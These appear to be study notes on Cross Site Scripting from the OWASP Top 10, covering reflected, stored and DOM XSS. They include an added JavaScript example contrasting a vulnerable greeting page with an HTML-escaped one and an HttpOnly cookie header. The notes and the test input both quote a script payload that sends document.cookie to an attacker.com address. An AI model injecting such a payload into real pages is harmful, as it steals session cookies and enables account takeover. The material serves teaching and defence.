7. Cross Site Scripting (OWASP TOP 10)

Cross Site Scripting

* 3 Types:

* Reflected XSS - A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim's browser. Typically the user will need to interact with some malicious link that points to an attacker-controlled page.

* Stored XSS - The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.

* DOM XSS - JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data in a page are vulnerable to DOM XSS.

* Example scenario (unsanitized input reflected into the page):

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'


This causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.

* Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.
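The reflected/stored flaw behind the scenario above, as an added JavaScript example that is not part of the original notes: a hypothetical greeting page that reflects a query value verbatim, the same page with context-aware HTML escaping, and an HttpOnly session cookie header that keeps document.cookie out of reach of any script that does run. The page template, function names and cookie values are constructed for the example.

```javascript
// Added example (not from the OWASP text). Node.js, no dependencies.

// Minimal HTML-entity escaping for untrusted text placed in an element body or
// a quoted attribute value. Each character listed can end an HTML context.
function escapeHtml(s) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Vulnerable: the user-supplied name is reflected into the page unchanged.
// (Hypothetical greeting page, constructed for the example.)
function renderGreetingVulnerable(name) {
  return `<html><body><h1>Hello ${name}</h1></body></html>`;
}

// Hardened: the same page, with the untrusted value escaped for HTML body context.
function renderGreetingSafe(name) {
  return `<html><body><h1>Hello ${escapeHtml(name)}</h1></body></html>`;
}

// Defence in depth for the cookie-theft scenario: a session cookie flagged
// HttpOnly is not exposed through document.cookie even if a script does run.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Simple check used here to show the difference: the greeting template never
// emits a <script> tag itself, so one in the output came from user input.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The payload from the OWASP scenario, used as the test input.
const PAYLOAD =
  "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";

console.log("vulnerable page has script tag:", containsScriptTag(renderGreetingVulnerable(PAYLOAD))); // true
console.log("hardened page has script tag:  ", containsScriptTag(renderGreetingSafe(PAYLOAD)));       // false
console.log(renderGreetingSafe(PAYLOAD));
console.log(sessionCookieHeader("constructed-session-id"));
```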

